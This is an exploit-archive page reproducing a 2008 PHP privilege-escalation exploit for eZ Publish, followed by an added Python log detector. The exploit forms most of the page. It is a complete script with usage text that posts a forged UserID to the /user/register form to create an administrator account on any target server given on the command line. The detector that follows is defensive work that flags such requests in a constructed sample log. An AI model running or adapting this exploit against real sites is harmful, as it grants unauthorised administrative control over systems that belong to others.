eZ Publish < 3.9.5/3.10.1/4.0.1 Privilege Escalation Exploit
Source: s4avrd0w@p0c.ru  Author: s4avrd0w  Published: 2008-12-11

#!/usr/bin/env php
<?php

/*
 eZ Publish privilege escalation exploit by s4avrd0w [s4avrd0w@p0c.ru]
 Versions affected >= 3.5.6
 Resolved in 3.9.5, 3.10.1, 4.0.1
 More info: http://ez.no/developer/security/security_advisories/ez_publish_3_9/ezsa_2008_003_insufficient_form_handling_made_privilege_escalation_possible

 * tested on version 3.9.0

 Requires the pecl_http 1.x extension (HttpRequest class).

 usage:

 # ./eZPublish_privilege_escalation_exploit.php -u=username -p=password -e=email -s=EZPublish_server

 All options are required:

 -u Login of the new admin on eZ Publish
 -p Password of the new admin on eZ Publish
 -e Email address that receives the activation message for the new admin account
 -s Target for privilege escalation

 example:

 # ./eZPublish_privilege_escalation_exploit.php -u=toor -p=P@ssw0rd -e=toor@mail.ru -s=http://127.0.0.1/
 [+] Exploit sent successfully
 [+] Activate your new account and log in to the system using toor/P@ssw0rd
*/

// Print the usage text; $script_name is the name the script was invoked as.
function help_argc($script_name)
{
print "
usage:

# ".$script_name." -u=username -p=password -e=email -s=EZPublish_server

All options are required:
 -u Login of the new admin on eZ Publish
 -p Password of the new admin on eZ Publish
 -e Email address that receives the activation message for the new admin account
 -s Target for privilege escalation

example:

# ".$script_name." -u=toor -p=P@ssw0rd -e=toor@mail.ru -s=http://127.0.0.1/
[+] Exploit sent successfully
[+] Activate your new account and log in to the system using toor/P@ssw0rd

";
}

// Report success with the credentials the caller supplied.
function successfully($login, $password)
{
print "
[+] Exploit sent successfully
[+] Activate your new account and log in to the system using $login/$password
";
}

// Exactly four options are expected (script name + 4 arguments).
if ($argc != 5 || in_array($argv[1], array('--help', '-help', '-h', '-?')))
{
 help_argc($argv[0]);
 exit(0);
}
else
{
 // Parse "-k=value" arguments into $ARG['k'] = 'value'.
 $ARG = array();
 foreach ($argv as $arg) {
  if (strpos($arg, '-') === 0) {
   $key = substr($arg, 1, 1);
   if (!isset($ARG[$key])) $ARG[$key] = substr($arg, 3);
  }
 }

 // Array keys must be quoted strings; the bare constants of the original
 // only worked through PHP's (now removed) undefined-constant fallback.
 if (!empty($ARG['u']) && !empty($ARG['p']) && !empty($ARG['e']) && !empty($ARG['s']))
 {

  // Registration form fields, plus the UserID the vulnerable form handler
  // accepts from the client (the advisory's "insufficient form handling").
  $post_fields = array(
   'ContentObjectAttribute_data_user_login_30' => $ARG['u'],
   'ContentObjectAttribute_data_user_password_30' => $ARG['p'],
   'ContentObjectAttribute_data_user_password_confirm_30' => $ARG['p'],
   'ContentObjectAttribute_data_user_email_30' => $ARG['e'],
   'UserID' => '14',
   'PublishButton' => '1'
  );

  $headers = array(
      'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14',
      'Referer' => $ARG['s']
  );

  $res_http = new HttpRequest($ARG['s']."/user/register", HttpRequest::METH_POST);
  $res_http->addPostFields($post_fields);
  $res_http->addHeaders($headers);
  try {
       $response = $res_http->send()->getBody();

   // eregi() was removed in PHP 7; a case-insensitive substring test is equivalent here.
   if (stripos($response, "success") !== false)
   {
    successfully($ARG['u'], $ARG['p']);
   }
   else
   {
    print "[-] Exploit failed\n";
   }

  } catch (HttpException $exception) {

   print "[-] Not connected\n";
   exit(0);

  }

 }
 else
 {
  help_argc($argv[0]);
  exit(0);
 }
}

?>
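The request the script sends has a simple signature a defender can look for: a POST to the self-registration form (`/user/register`) that carries a client-supplied `UserID` field, which a legitimate registration never includes. The detector below is an added example, not part of the original exploit or of eZ Publish; the log format it parses (client IP, method, path, form body on one line) is constructed for the example, as are the sample lines.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed sample of reverse-proxy log lines that record POST bodies.
# Hypothetical format: "<client-ip> <method> <path> <form-body-or-dash>".
SAMPLE_LOG = """\
10.0.0.5 POST /user/register ContentObjectAttribute_data_user_login_30=alice&ContentObjectAttribute_data_user_password_30=x&ContentObjectAttribute_data_user_email_30=alice%40example.org&PublishButton=1
10.0.0.9 POST /eng/user/register ContentObjectAttribute_data_user_login_30=toor&ContentObjectAttribute_data_user_password_30=P%40ssw0rd&ContentObjectAttribute_data_user_email_30=toor%40mail.ru&UserID=14&PublishButton=1
10.0.0.9 GET /user/register -
10.0.0.7 POST /content/edit UserID=14&PublishButton=1
"""


def parse_line(line):
    """Split one constructed log line into its four fields."""
    ip, method, path, body = line.split(" ", 3)
    return {"ip": ip, "method": method, "path": path, "body": body}


def is_registration_with_user_id(entry):
    """True when a registration POST carries a client-supplied UserID.

    The path check uses endswith() because eZ Publish URLs may be prefixed
    with a siteaccess name (e.g. /eng/user/register).
    """
    if entry["method"] != "POST":
        return False
    path = urlsplit(entry["path"]).path.rstrip("/")
    if not path.endswith("/user/register"):
        return False
    fields = parse_qs(entry["body"], keep_blank_values=True)
    return "UserID" in fields


def find_suspicious(log_text):
    """Return (client-ip, requested-login, UserID) for each matching line."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        entry = parse_line(line)
        if not is_registration_with_user_id(entry):
            continue
        fields = parse_qs(entry["body"], keep_blank_values=True)
        login = next((v[0] for k, v in fields.items()
                      if k.startswith("ContentObjectAttribute_data_user_login_")), "?")
        hits.append((entry["ip"], login, fields["UserID"][0]))
    return hits


if __name__ == "__main__":
    for ip, login, uid in find_suspicious(SAMPLE_LOG):
        print(f"[!] {ip} registered '{login}' with client-supplied UserID={uid}")
```

Only the second sample line is reported: the first is a normal registration, the third is not a POST, and the fourth carries UserID on a different form.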
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved